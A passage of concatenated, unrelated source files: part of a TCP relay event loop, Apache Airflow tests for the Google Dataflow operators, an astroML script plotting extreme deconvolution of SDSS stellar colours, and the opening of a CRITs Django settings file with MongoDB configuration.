logging.log(shell.VERBOSE_LEVEL, 'sweeping timeouts')
now = time.time()
length = len(self._timeouts)
pos = self._timeout_offset
while pos < length:
handler = self._timeouts[pos]
if handler:
if now - handler.last_activity < self._timeout:
break
else:
if handler.remote_address:
logging.warn('timed out: %s:%d' %
handler.remote_address)
else:
logging.warn('timed out')
handler.destroy()
self._timeouts[pos] = None # free memory
pos += 1
else:
pos += 1
if pos > TIMEOUTS_CLEAN_SIZE and pos > length >> 1:
# clean up the timeout queue when it gets larger than half
# of the queue
self._timeouts = self._timeouts[pos:]
for key in self._handler_to_timeouts:
self._handler_to_timeouts[key] -= pos
pos = 0
self._timeout_offset = pos
def handle_event(self, sock, fd, event):
# handle events and dispatch to handlers
if sock:
logging.log(shell.VERBOSE_LEVEL, 'fd %d %s', fd,
eventloop.EVENT_NAMES.get(event, event))
if sock == self._server_socket:
if event & eventloop.POLL_ERR:
# TODO
raise Exception('server_socket error')
try:
logging.debug('accept')
conn = self._server_socket.accept()
TCPRelayHandler(self, self._fd_to_handlers,
self._eventloop, conn[0], self._config,
self._dns_resolver, self._is_local)
except socket.error as err:
error_no = err.args[0]
if sys.platform == "win32":
if error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK, errno.WSAEWOULDBLOCK):
return
elif error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK):
return
else:
shell.print_exception(err)
if self._config['verbose']:
traceback.print_exc()
else:
if sock:
handler = self._fd_to_handlers.get(fd, None)
if handler:
handler.handle_event(sock, event)
else:
logging.warn('poll removed fd')
def handle_periodic(self):
if self._closed:
if self._server_socket:
self._eventloop.remove(self._server_socket)
self._server_socket.close()
self._server_socket = None
logging.info('closed TCP port %d', self._listen_port)
if not self._fd_to_handlers:
logging.info('stopping')
self._eventloop.stop()
self._sweep_timeout()
def close(self, next_tick=False):
logging.debug('TCP close')
self._closed = True
if not next_tick:
if self._eventloop:
self._eventloop.remove_periodic(self.handle_periodic)
self._eventloop.remove(self._server_socket)
self._server_socket.close()
for handler in list(self._fd_to_handlers.values()):
handler.destroy()
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import copy
import unittest
from copy import deepcopy
from unittest import mock
import airflow
from airflow.providers.google.cloud.operators.dataflow import (
CheckJobRunning,
DataflowCreateJavaJobOperator,
DataflowCreatePythonJobOperator,
DataflowStartFlexTemplateOperator,
DataflowStartSqlJobOperator,
DataflowTemplatedJobStartOperator,
)
from airflow.version import version
TASK_ID = 'test-dataflow-operator'
JOB_ID = 'test-dataflow-pipeline-id'
JOB_NAME = 'test-dataflow-pipeline-name'
TEMPLATE = 'gs://dataflow-templates/wordcount/template_file'
PARAMETERS = {
'inputFile': 'gs://dataflow-samples/shakespeare/kinglear.txt',
'output': 'gs://test/output/my_output',
}
PY_FILE = 'gs://my-bucket/my-object.py'
PY_INTERPRETER = 'python3'
JAR_FILE = 'gs://my-bucket/example/test.jar'
JOB_CLASS = 'com.test.NotMain'
PY_OPTIONS = ['-m']
DEFAULT_OPTIONS_PYTHON = DEFAULT_OPTIONS_JAVA = {
'project': 'test',
'stagingLocation': 'gs://test/staging',
}
DEFAULT_OPTIONS_TEMPLATE = {
'project': 'test',
'stagingLocation': 'gs://test/staging',
'tempLocation': 'gs://test/temp',
'zone': 'us-central1-f',
}
ADDITIONAL_OPTIONS = {'output': 'gs://test/output', 'labels': {'foo': 'bar'}}
TEST_VERSION = f"v{version.replace('.', '-').replace('+', '-')}"
EXPECTED_ADDITIONAL_OPTIONS = {
'output': 'gs://test/output',
'labels': {'foo': 'bar', 'airflow-version': TEST_VERSION},
}
POLL_SLEEP = 30
GCS_HOOK_STRING = 'airflow.providers.google.cloud.operators.dataflow.{}'
TEST_FLEX_PARAMETERS = {
"containerSpecGcsPath": "gs://test-bucket/test-file",
"jobName": 'test-job-name',
"parameters": {
"inputSubscription": 'test-subscription',
"outputTable": "test-project:test-dataset.streaming_beam_sql",
},
}
TEST_LOCATION = 'custom-location'
TEST_PROJECT = "test-project"
TEST_SQL_JOB_NAME = 'test-sql-job-name'
TEST_DATASET = 'test-dataset'
TEST_SQL_OPTIONS = {
"bigquery-project": TEST_PROJECT,
"bigquery-dataset": TEST_DATASET,
"bigquery-table": "beam_output",
'bigquery-write-disposition': "write-truncate",
}
TEST_SQL_QUERY = """
SELECT
sales_region as sales_region,
count(state_id) as count_state
FROM
bigquery.table.test-project.beam_samples.beam_table
GROUP BY sales_region;
"""
TEST_SQL_JOB = {'id': 'test-job-id'}
class TestDataflowPythonOperator(unittest.TestCase):
def setUp(self):
self.dataflow = DataflowCreatePythonJobOperator(
task_id=TASK_ID,
py_file=PY_FILE,
job_name=JOB_NAME,
py_options=PY_OPTIONS,
dataflow_default_options=DEFAULT_OPTIONS_PYTHON,
options=ADDITIONAL_OPTIONS,
poll_sleep=POLL_SLEEP,
location=TEST_LOCATION,
)
self.expected_airflow_version = 'v' + airflow.version.version.replace(".", "-").replace("+", "-")
def test_init(self):
"""Test DataFlowPythonOperator instance is properly initialized."""
assert self.dataflow.task_id == TASK_ID
assert self.dataflow.job_name == JOB_NAME
assert self.dataflow.py_file == PY_FILE
assert self.dataflow.py_options == PY_OPTIONS
assert self.dataflow.py_interpreter == PY_INTERPRETER
assert self.dataflow.poll_sleep == POLL_SLEEP
assert self.dataflow.dataflow_default_options == DEFAULT_OPTIONS_PYTHON
assert self.dataflow.options == EXPECTED_ADDITIONAL_OPTIONS
@mock.patch(
'airflow.providers.google.cloud.operators.dataflow.process_line_and_extract_dataflow_job_id_callback'
)
@mock.patch('airflow.providers.google.cloud.operators.dataflow.BeamHook')
@mock.patch('airflow.providers.google.cloud.operators.dataflow.DataflowHook')
@mock.patch('airflow.providers.google.cloud.operators.dataflow.GCSHook')
def test_exec(self, gcs_hook, dataflow_hook_mock, beam_hook_mock, mock_callback_on_job_id):
"""Test DataflowHook is created and the right args are passed to
start_python_workflow.
"""
start_python_mock = beam_hook_mock.return_value.start_python_pipeline
provide_gcloud_mock = dataflow_hook_mock.return_value.provide_authorized_gcloud
gcs_provide_file = gcs_hook.return_value.provide_file
job_name = dataflow_hook_mock.return_value.build_dataflow_job_name.return_value
self.dataflow.execute(None)
beam_hook_mock.assert_called_once_with(runner="DataflowRunner")
self.assertTrue(self.dataflow.py_file.startswith('/tmp/dataflow'))
gcs_provide_file.assert_called_once_with(object_url=PY_FILE)
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback=mock.ANY)
dataflow_hook_mock.assert_called_once_with(
gcp_conn_id="google_cloud_default",
delegate_to=mock.ANY,
poll_sleep=POLL_SLEEP,
impersonation_chain=None,
drain_pipeline=False,
cancel_timeout=mock.ANY,
wait_until_finished=None,
)
expected_options = {
"project": dataflow_hook_mock.return_value.project_id,
"staging_location": 'gs://test/staging',
"job_name": job_name,
"region": TEST_LOCATION,
'output': 'gs://test/output',
'labels': {'foo': 'bar', 'airflow-version': self.expected_airflow_version},
}
start_python_mock.assert_called_once_with(
variables=expected_options,
py_file=gcs_provide_file.return_value.__enter__.return_value.name,
py_options=PY_OPTIONS,
py_interpreter=PY_INTERPRETER,
py_requirements=None,
py_system_site_packages=False,
process_line_callback=mock_callback_on_job_id.return_value,
)
dataflow_hook_mock.return_value.wait_for_done.assert_called_once_with(
job_id=mock.ANY,
job_name=job_name,
location=TEST_LOCATION,
multiple_jobs=False,
)
assert self.dataflow.py_file.startswith('/tmp/dataflow')
provide_gcloud_mock.assert_called_once_with()
class TestDataflowJavaOperator(unittest.TestCase):
def setUp(self):
self.dataflow = DataflowCreateJavaJobOperator(
task_id=TASK_ID,
jar=JAR_FILE,
job_name=JOB_NAME,
job_class=JOB_CLASS,
dataflow_default_options=DEFAULT_OPTIONS_JAVA,
options=ADDITIONAL_OPTIONS,
poll_sleep=POLL_SLEEP,
location=TEST_LOCATION,
)
self.expected_airflow_version = 'v' + airflow.version.version.replace(".", "-").replace("+", "-")
def test_init(self):
"""Test DataflowTemplateOperator instance is properly initialized."""
assert self.dataflow.task_id == TASK_ID
assert self.dataflow.job_name == JOB_NAME
assert self.dataflow.poll_sleep == POLL_SLEEP
assert self.dataflow.dataflow_default_options == DEFAULT_OPTIONS_JAVA
assert self.dataflow.job_class == JOB_CLASS
assert self.dataflow.jar == JAR_FILE
assert self.dataflow.options == EXPECTED_ADDITIONAL_OPTIONS
assert self.dataflow.check_if_running == CheckJobRunning.WaitForRun
@mock.patch(
'airflow.providers.google.cloud.operators.dataflow.process_line_and_extract_dataflow_job_id_callback'
)
@mock.patch('airflow.providers.google.cloud.operators.dataflow.BeamHook')
@mock.patch('airflow.providers.google.cloud.operators.dataflow.DataflowHook')
@mock.patch('airflow.providers.google.cloud.operators.dataflow.GCSHook')
def test_exec(self, gcs_hook, dataflow_hook_mock, beam_hook_mock, mock_callback_on_job_id):
"""Test DataflowHook is created and the right args are passed to
start_java_workflow.
"""
start_java_mock = beam_hook_mock.return_value.start_java_pipeline
gcs_provide_file = gcs_hook.return_value.provide_file
job_name = dataflow_hook_mock.return_value.build_dataflow_job_name.return_value
provide_gcloud_mock = dataflow_hook_mock.return_value.provide_authorized_gcloud
self.dataflow.check_if_running = CheckJobRunning.IgnoreJob
self.dataflow.execute(None)
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback=mock.ANY)
gcs_provide_file.assert_called_once_with(object_url=JAR_FILE)
expected_variables = {
'project': dataflow_hook_mock.return_value.project_id,
'stagingLocation': 'gs://test/staging',
'jobName': job_name,
'region': TEST_LOCATION,
'output': 'gs://test/output',
'labels': {'foo': 'bar', 'airflow-version': self.expected_airflow_version},
}
start_java_mock.assert_called_once_with(
variables=expected_variables,
jar=gcs_provide_file.return_value.__enter__.return_value.name,
job_class=JOB_CLASS,
process_line_callback=mock_callback_on_job_id.return_value,
)
dataflow_hook_mock.return_value.wait_for_done.assert_called_once_with(
job_id=mock.ANY,
job_name=job_name,
location=TEST_LOCATION,
multiple_jobs=None,
)
provide_gcloud_mock.assert_called_once_with()
@mock.patch('airflow.providers.google.cloud.operators.dataflow.BeamHook')
@mock.patch('airflow.providers.google.cloud.operators.dataflow.DataflowHook')
@mock.patch('airflow.providers.google.cloud.operators.dataflow.GCSHook')
def test_check_job_running_exec(self, gcs_hook, dataflow_mock, beam_hook_mock):
"""Test DataflowHook is created and the right args are passed to
start_java_workflow.
"""
dataflow_running = dataflow_mock.return_value.is_job_dataflow_running
dataflow_running.return_value = True
start_java_hook = beam_hook_mock.return_value.start_java_pipeline
gcs_provide_file = gcs_hook.return_value.provide_file
self.dataflow.check_if_running = True
self.dataflow.execute(None)
self.assertTrue(dataflow_mock.called)
start_java_hook.assert_not_called()
gcs_provide_file.assert_called_once()
variables = {
'project': dataflow_mock.return_value.project_id,
'stagingLocation': 'gs://test/staging',
'jobName': JOB_NAME,
'region': TEST_LOCATION,
'output': 'gs://test/output',
'labels': {'foo': 'bar', 'airflow-version': self.expected_airflow_version},
}
dataflow_running.assert_called_once_with(name=JOB_NAME, variables=variables)
@mock.patch(
'airflow.providers.google.cloud.operators.dataflow.process_line_and_extract_dataflow_job_id_callback'
)
@mock.patch('airflow.providers.google.cloud.operators.dataflow.BeamHook')
@mock.patch('airflow.providers.google.cloud.operators.dataflow.DataflowHook')
@mock.patch('airflow.providers.google.cloud.operators.dataflow.GCSHook')
def test_check_job_not_running_exec(
self, gcs_hook, dataflow_hook_mock, beam_hook_mock, mock_callback_on_job_id
):
"""Test DataflowHook is created and the right args are passed to
start_java_workflow with option to check if job is running
"""
is_job_dataflow_running_variables = None
def set_is_job_dataflow_running_variables(*args, **kwargs):
nonlocal is_job_dataflow_running_variables
is_job_dataflow_running_variables = copy.deepcopy(kwargs.get("variables"))
dataflow_running = dataflow_hook_mock.return_value.is_job_dataflow_running
dataflow_running.side_effect = set_is_job_dataflow_running_variables
dataflow_running.return_value = False
start_java_mock = beam_hook_mock.return_value.start_java_pipeline
gcs_provide_file = gcs_hook.return_value.provide_file
self.dataflow.check_if_running = True
self.dataflow.execute(None)
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback=mock.ANY)
gcs_provide_file.assert_called_once_with(object_url=JAR_FILE)
expected_variables = {
'project': dataflow_hook_mock.return_value.project_id,
'stagingLocation': 'gs://test/staging',
'jobName': JOB_NAME,
'region': TEST_LOCATION,
'output': 'gs://test/output',
'labels': {'foo': 'bar', 'airflow-version': self.expected_airflow_version},
}
self.assertEqual(expected_variables, is_job_dataflow_running_variables)
job_name = dataflow_hook_mock.return_value.build_dataflow_job_name.return_value
expected_variables["jobName"] = job_name
start_java_mock.assert_called_once_with(
variables=expected_variables,
jar=gcs_provide_file.return_value.__enter__.return_value.name,
job_class=JOB_CLASS,
process_line_callback=mock_callback_on_job_id.return_value,
)
dataflow_hook_mock.return_value.wait_for_done.assert_called_once_with(
job_id=mock.ANY,
job_name=job_name,
location=TEST_LOCATION,
multiple_jobs=None,
)
@mock.patch(
'airflow.providers.google.cloud.operators.dataflow.process_line_and_extract_dataflow_job_id_callback'
)
@mock.patch('airflow.providers.google.cloud.operators.dataflow.BeamHook')
@mock.patch('airflow.providers.google.cloud.operators.dataflow.DataflowHook')
@mock.patch('airflow.providers.google.cloud.operators.dataflow.GCSHook')
def test_check_multiple_job_exec(
self, gcs_hook, dataflow_hook_mock, beam_hook_mock, mock_callback_on_job_id
):
"""Test DataflowHook is created and the right args are passed to
start_java_workflow with option to check if job is running
"""
is_job_dataflow_running_variables = None
def set_is_job_dataflow_running_variables(*args, **kwargs):
nonlocal is_job_dataflow_running_variables
is_job_dataflow_running_variables = copy.deepcopy(kwargs.get("variables"))
dataflow_running = dataflow_hook_mock.return_value.is_job_dataflow_running
dataflow_running.side_effect = set_is_job_dataflow_running_variables
dataflow_running.return_value = False
start_java_mock = beam_hook_mock.return_value.start_java_pipeline
gcs_provide_file = gcs_hook.return_value.provide_file
self.dataflow.check_if_running = True
self.dataflow.multiple_jobs = True
self.dataflow.execute(None)
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback=mock.ANY)
gcs_provide_file.assert_called_once_with(object_url=JAR_FILE)
expected_variables = {
'project': dataflow_hook_mock.return_value.project_id,
'stagingLocation': 'gs://test/staging',
'jobName': JOB_NAME,
'region': TEST_LOCATION,
'output': 'gs://test/output',
'labels': {'foo': 'bar', 'airflow-version': self.expected_airflow_version},
}
self.assertEqual(expected_variables, is_job_dataflow_running_variables)
job_name = dataflow_hook_mock.return_value.build_dataflow_job_name.return_value
expected_variables["jobName"] = job_name
start_java_mock.assert_called_once_with(
variables=expected_variables,
jar=gcs_provide_file.return_value.__enter__.return_value.name,
job_class=JOB_CLASS,
process_line_callback=mock_callback_on_job_id.return_value,
)
dataflow_hook_mock.return_value.wait_for_done.assert_called_once_with(
job_id=mock.ANY,
job_name=job_name,
location=TEST_LOCATION,
multiple_jobs=True,
)
class TestDataflowTemplateOperator(unittest.TestCase):
def setUp(self):
self.dataflow = DataflowTemplatedJobStartOperator(
task_id=TASK_ID,
template=TEMPLATE,
job_name=JOB_NAME,
parameters=PARAMETERS,
options=DEFAULT_OPTIONS_TEMPLATE,
dataflow_default_options={"EXTRA_OPTION": "TEST_A"},
poll_sleep=POLL_SLEEP,
location=TEST_LOCATION,
environment={"maxWorkers": 2},
)
@mock.patch('airflow.providers.google.cloud.operators.dataflow.DataflowHook')
def test_exec(self, dataflow_mock):
"""Test DataflowHook is created and the right args are passed to
start_template_workflow.
"""
start_template_hook = dataflow_mock.return_value.start_template_dataflow
self.dataflow.execute(None)
assert dataflow_mock.called
expected_options = {
'project': 'test',
'stagingLocation': 'gs://test/staging',
'tempLocation': 'gs://test/temp',
'zone': 'us-central1-f',
'EXTRA_OPTION': "TEST_A",
}
start_template_hook.assert_called_once_with(
job_name=JOB_NAME,
variables=expected_options,
parameters=PARAMETERS,
dataflow_template=TEMPLATE,
on_new_job_callback=mock.ANY,
project_id=None,
location=TEST_LOCATION,
environment={'maxWorkers': 2},
)
class TestDataflowStartFlexTemplateOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.dataflow.DataflowHook')
def test_execute(self, mock_dataflow):
start_flex_template = DataflowStartFlexTemplateOperator(
task_id="start_flex_template_streaming_beam_sql",
body={"launchParameter": TEST_FLEX_PARAMETERS},
do_xcom_push=True,
project_id=TEST_PROJECT,
location=TEST_LOCATION,
)
start_flex_template.execute(mock.MagicMock())
mock_dataflow.return_value.start_flex_template.assert_called_once_with(
body={"launchParameter": TEST_FLEX_PARAMETERS},
location=TEST_LOCATION,
project_id=TEST_PROJECT,
on_new_job_callback=mock.ANY,
)
def test_on_kill(self):
start_flex_template = DataflowStartFlexTemplateOperator(
task_id="start_flex_template_streaming_beam_sql",
body={"launchParameter": TEST_FLEX_PARAMETERS},
do_xcom_push=True,
location=TEST_LOCATION,
project_id=TEST_PROJECT,
)
start_flex_template.hook = mock.MagicMock()
start_flex_template.job = {"id": JOB_ID, "projectId": TEST_PROJECT, "location": TEST_LOCATION}
start_flex_template.on_kill()
start_flex_template.hook.cancel_job.assert_called_once_with(
job_id='test-dataflow-pipeline-id', project_id=TEST_PROJECT, location=TEST_LOCATION
)
class TestDataflowSqlOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.dataflow.DataflowHook')
def test_execute(self, mock_hook):
start_sql = DataflowStartSqlJobOperator(
task_id="start_sql_query",
job_name=TEST_SQL_JOB_NAME,
query=TEST_SQL_QUERY,
options=deepcopy(TEST_SQL_OPTIONS),
location=TEST_LOCATION,
do_xcom_push=True,
)
start_sql.execute(mock.MagicMock())
mock_hook.assert_called_once_with(
gcp_conn_id='google_cloud_default', delegate_to=None, drain_pipeline=False
)
mock_hook.return_value.start_sql_job.assert_called_once_with(
job_name=TEST_SQL_JOB_NAME,
query=TEST_SQL_QUERY,
options=TEST_SQL_OPTIONS,
location=TEST_LOCATION,
project_id=None,
on_new_job_callback=mock.ANY,
)
start_sql.job = TEST_SQL_JOB
start_sql.on_kill()
mock_hook.return_value.cancel_job.assert_called_once_with(
job_id='test-job-id', project_id=None, location=None
)
|
|
"""
Extreme Deconvolution of Stellar Data
-------------------------------------
Figure 6.12
Extreme deconvolution applied to stellar data from SDSS Stripe 82. The top
panels compare the color distributions for a high signal-to-noise sample of
standard stars (left) with lower signal-to-noise, single epoch, data (right).
The middle panels show the results of applying extreme deconvolution to the
single epoch data. The bottom panel compares the distributions of a color
measured perpendicularly to the locus (the so-called w color is defined
following Ivezic et al 2004). The distribution of colors from the extreme
deconvolution of the noisy data recovers the tight distribution of the high
signal-to-noise data.
"""
# Author: Jake VanderPlas
# License: BSD
# The figure produced by this code is published in the textbook
# "Statistics, Data Mining, and Machine Learning in Astronomy" (2013)
# For more information, see http://astroML.github.com
# To report a bug or issue, use the following forum:
# https://groups.google.com/forum/#!forum/astroml-general
from __future__ import print_function, division
import numpy as np
from matplotlib import pyplot as plt
from astroML.density_estimation import XDGMM
from astroML.crossmatch import crossmatch
from astroML.datasets import fetch_sdss_S82standards, fetch_imaging_sample
from astroML.plotting.tools import draw_ellipse
from astroML.decorators import pickle_results
from astroML.stats import sigmaG
#----------------------------------------------------------------------
# This function adjusts matplotlib settings for a uniform feel in the textbook.
# Note that with usetex=True, fonts are rendered with LaTeX. This may
# result in an error if LaTeX is not installed on your system. In that case,
# you can set usetex to False.
from astroML.plotting import setup_text_plots
setup_text_plots(fontsize=8, usetex=True)
#------------------------------------------------------------
# define u-g-r-i-z extinction from Berry et al, arXiv 1111.4985
# multiply extinction by A_r
extinction_vector = np.array([1.810, 1.400, 1.0, 0.759, 0.561])
#----------------------------------------------------------------------
# Fetch and process the noisy imaging data
data_noisy = fetch_imaging_sample()
# select only stars
data_noisy = data_noisy[data_noisy['type'] == 6]
# Get the extinction-corrected magnitudes for each band
X = np.vstack([data_noisy[f + 'RawPSF'] for f in 'ugriz']).T
Xerr = np.vstack([data_noisy[f + 'psfErr'] for f in 'ugriz']).T
# extinction terms from Berry et al, arXiv 1111.4985
X -= (extinction_vector * data_noisy['rExtSFD'][:, None])
#----------------------------------------------------------------------
# Fetch and process the stacked imaging data
data_stacked = fetch_sdss_S82standards()
# cut to RA, DEC range of imaging sample
RA = data_stacked['RA']
DEC = data_stacked['DEC']
data_stacked = data_stacked[(RA > 0) & (RA < 10) &
(DEC > -1) & (DEC < 1)]
# get stacked magnitudes for each band
Y = np.vstack([data_stacked['mmu_' + f] for f in 'ugriz']).T
Yerr = np.vstack([data_stacked['msig_' + f] for f in 'ugriz']).T
# extinction terms from Berry et al, arXiv 1111.4985
Y -= (extinction_vector * data_stacked['A_r'][:, None])
# quality cuts
g = Y[:, 1]
mask = ((Yerr.max(1) < 0.05) &
(g < 20))
data_stacked = data_stacked[mask]
Y = Y[mask]
Yerr = Yerr[mask]
#----------------------------------------------------------------------
# cross-match
# the imaging sample contains both standard and variable stars. We'll
# perform a cross-match with the standard star catalog and choose objects
# which are common to both.
Xlocs = np.hstack((data_noisy['ra'][:, np.newaxis],
data_noisy['dec'][:, np.newaxis]))
Ylocs = np.hstack((data_stacked['RA'][:, np.newaxis],
data_stacked['DEC'][:, np.newaxis]))
print("number of noisy points: ", Xlocs.shape)
print("number of stacked points:", Ylocs.shape)
# find all points within 0.9 arcsec. This cutoff was selected
# by plotting a histogram of the log(distances).
dist, ind = crossmatch(Xlocs, Ylocs, max_distance=0.9 / 3600)
noisy_mask = (~np.isinf(dist))
stacked_mask = ind[noisy_mask]
# select the data
data_noisy = data_noisy[noisy_mask]
X = X[noisy_mask]
Xerr = Xerr[noisy_mask]
data_stacked = data_stacked[stacked_mask]
Y = Y[stacked_mask]
Yerr = Yerr[stacked_mask]
# double-check that our cross-match succeeded
assert X.shape == Y.shape
print("size after crossmatch:", X.shape)
#----------------------------------------------------------------------
# perform extreme deconvolution on the noisy sample
# first define mixing matrix W
W = np.array([[0, 1, 0, 0, 0], # g magnitude
[1, -1, 0, 0, 0], # u-g color
[0, 1, -1, 0, 0], # g-r color
[0, 0, 1, -1, 0], # r-i color
[0, 0, 0, 1, -1]]) # i-z color
X = np.dot(X, W.T)
Y = np.dot(Y, W.T)
# compute error covariance from mixing matrix
Xcov = np.zeros(Xerr.shape + Xerr.shape[-1:])
Xcov[:, range(Xerr.shape[1]), range(Xerr.shape[1])] = Xerr ** 2
# each covariance C = WCW^T
# best way to do this is with a tensor dot-product
Xcov = np.tensordot(np.dot(Xcov, W.T), W, (-2, -1))
#----------------------------------------------------------------------
# This is a long calculation: save results to file
@pickle_results("XD_stellar.pkl")
def compute_XD(n_clusters=12, rseed=0, n_iter=100, verbose=True):
np.random.seed(rseed)
clf = XDGMM(n_clusters, n_iter=n_iter, tol=1E-5, verbose=verbose)
clf.fit(X, Xcov)
return clf
clf = compute_XD(12)
#------------------------------------------------------------
# Fit and sample from the underlying distribution
np.random.seed(42)
X_sample = clf.sample(X.shape[0])
#------------------------------------------------------------
# plot the results
fig = plt.figure(figsize=(5, 3.75))
fig.subplots_adjust(left=0.12, right=0.95,
bottom=0.1, top=0.95,
wspace=0.02, hspace=0.02)
# only plot 1/10 of the stars for clarity
ax1 = fig.add_subplot(221)
ax1.scatter(Y[::10, 2], Y[::10, 3], s=9, lw=0, c='k')
ax2 = fig.add_subplot(222)
ax2.scatter(X[::10, 2], X[::10, 3], s=9, lw=0, c='k')
ax3 = fig.add_subplot(223)
ax3.scatter(X_sample[::10, 2], X_sample[::10, 3], s=9, lw=0, c='k')
ax4 = fig.add_subplot(224)
for i in range(clf.n_components):
draw_ellipse(clf.mu[i, 2:4], clf.V[i, 2:4, 2:4], scales=[2],
ec='k', fc='gray', alpha=0.2, ax=ax4)
titles = ["Standard Stars", "Single Epoch",
"Extreme Deconvolution\n resampling",
"Extreme Deconvolution\n cluster locations"]
ax = [ax1, ax2, ax3, ax4]
for i in range(4):
ax[i].set_xlim(-0.6, 1.8)
ax[i].set_ylim(-0.6, 1.8)
ax[i].xaxis.set_major_locator(plt.MultipleLocator(0.5))
ax[i].yaxis.set_major_locator(plt.MultipleLocator(0.5))
ax[i].text(0.05, 0.95, titles[i],
ha='left', va='top', transform=ax[i].transAxes)
if i in (0, 1):
ax[i].xaxis.set_major_formatter(plt.NullFormatter())
else:
ax[i].set_xlabel('$g-r$')
if i in (1, 3):
ax[i].yaxis.set_major_formatter(plt.NullFormatter())
else:
ax[i].set_ylabel('$r-i$')
#------------------------------------------------------------
# Second figure: the width of the locus
fig = plt.figure(figsize=(5, 3.75))
ax = fig.add_subplot(111)
labels = ['single epoch', 'standard stars', 'XD resampled']
linestyles = ['solid', 'dashed', 'dotted']
for data, label, ls in zip((X, Y, X_sample), labels, linestyles):
g = data[:, 0]
gr = data[:, 2]
ri = data[:, 3]
r = g - gr
i = r - ri
mask = (gr > 0.3) & (gr < 1.0)
g = g[mask]
r = r[mask]
i = i[mask]
w = -0.227 * g + 0.792 * r - 0.567 * i + 0.05
sigma = sigmaG(w)
ax.hist(w, bins=np.linspace(-0.08, 0.08, 100), linestyle=ls,
histtype='step', label=label + '\n\t' + r'$\sigma_G=%.3f$' % sigma,
normed=True)
ax.legend(loc=2)
ax.text(0.95, 0.95, '$w = -0.227g + 0.792r$\n$ - 0.567i + 0.05$',
transform=ax.transAxes, ha='right', va='top')
ax.set_xlim(-0.07, 0.07)
ax.set_ylim(0, 55)
ax.set_xlabel('$w$')
ax.set_ylabel('$N(w)$')
plt.show()
|
|
# CRITs environment chooser
import errno
import glob
import os
import sys
import django
import subprocess
from pymongo import ReadPreference, MongoClient
from mongoengine import connect
sys.path.insert(0, os.path.dirname(__file__))
# calculated paths for django and the site
# used as starting points for various other paths
DJANGO_ROOT = os.path.dirname(os.path.realpath(django.__file__))
SITE_ROOT = os.path.dirname(os.path.realpath(__file__))
# Version
CRITS_VERSION = '4-master'
#the following gets the current git hash to be displayed in the footer and
#hides it if it is not a git repo
try:
HIDE_GIT_HASH = False
#get the short hand of current git hash
GIT_HASH = subprocess.check_output(['git', 'rev-parse', '--short', 'HEAD'], cwd=SITE_ROOT).strip()
#get the long hand of the current git hash
GIT_HASH_LONG = subprocess.check_output(['git', 'rev-parse', 'HEAD'], cwd=SITE_ROOT).strip()
#get the git branch
GIT_BRANCH = subprocess.check_output(['git', 'rev-parse', '--abbrev-ref', 'HEAD'], cwd=SITE_ROOT).strip()
except:
#if it is not a git repo, clear out all values and hide them
GIT_HASH = ''
GIT_HASH_LONG = ''
HIDE_GIT_HASH = True
GIT_BRANCH = ''
APPEND_SLASH = True
TEST_RUN = False
# Set to DENY|SAMEORIGIN|ALLOW-FROM uri
# Default: SAMEORIGIN
# More details: https://developer.mozilla.org/en-US/docs/HTTP/X-Frame-Options
#X_FRAME_OPTIONS = 'ALLOW-FROM https://www.example.com'
SECURE_SSL_REDIRECT = True
# Setup for runserver or Apache
if 'runserver' in sys.argv:
DEVEL_INSTANCE = True
SERVICE_MODEL = 'thread'
SESSION_COOKIE_SECURE = False
CSRF_COOKIE_SECURE = False
LOGIN_URL = "/login/"
elif 'test' in sys.argv:
TEST_RUN = True
DEVEL_INSTANCE = True
SERVICE_MODEL = 'thread'
SESSION_COOKIE_SECURE = False
CSRF_COOKIE_SECURE = False
LOGIN_URL = "/login/"
else:
DEVEL_INSTANCE = True
SERVICE_MODEL = 'process'
SESSION_COOKIE_SECURE = True
CSRF_COOKIE_SECURE = True
LOGIN_URL = "/login/"
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.dummy'
}
}
# MongoDB Default Configuration
# Tip: To change database settings, override by using
# template from config/database_example.py
MONGO_HOST = 'localhost' # server to connect to
MONGO_PORT = 27017 # port MongoD is running on
MONGO_DATABASE = 'crits' # database name to connect to
MONGO_SSL = False # whether MongoD has SSL enabled
MONGO_USER = '' # username used to authenticate to mongo (normally empty)
MONGO_PASSWORD = '' # password for the mongo user
# File storage backends
S3 = "S3"
GRIDFS = "GRIDFS"
# DB to use for files
FILE_DB = GRIDFS
# S3 buckets
BUCKET_PCAPS = "pcaps"
BUCKET_OBJECTS = "objects"
BUCKET_SAMPLES = "samples"
# Import custom Database config
dbfile = os.path.join(SITE_ROOT, 'config/database.py')
if os.path.exists(dbfile):
execfile(dbfile)
if TEST_RUN:
MONGO_DATABASE = 'crits-unittest'
# Read preference to configure which nodes you can read from
# Possible values:
# primary: queries are sent to the primary node in a replicSet
# secondary: queries are allowed if sent to primary or secondary
# (for single host) or are distributed to secondaries
# if you are connecting through a router
# More info can be found here:
# http://api.mongodb.org/python/current/api/pymongo/index.html
MONGO_READ_PREFERENCE = ReadPreference.PRIMARY
# MongoDB default collections
COL_ACTORS = "actors" # main collection for actors
COL_ACTOR_IDENTIFIERS = "actor_identifiers" # main collection for actor identifiers
COL_ACTOR_THREAT_IDENTIFIERS = "actor_threat_identifiers" # actor threat identifiers
COL_ACTOR_THREAT_TYPES = "actor_threat_types" # actor threat types
COL_ACTOR_MOTIVATIONS = "actor_motivations" # actor motivations
COL_ACTOR_SOPHISTICATIONS = "actor_sophistications" # actor sophistications
COL_ACTOR_INTENDED_EFFECTS = "actor_intended_effects" # actor intended effects
COL_ANALYSIS_RESULTS = "analysis_results" # analysis results
COL_AUDIT_LOG = "audit_log" # audit log entries
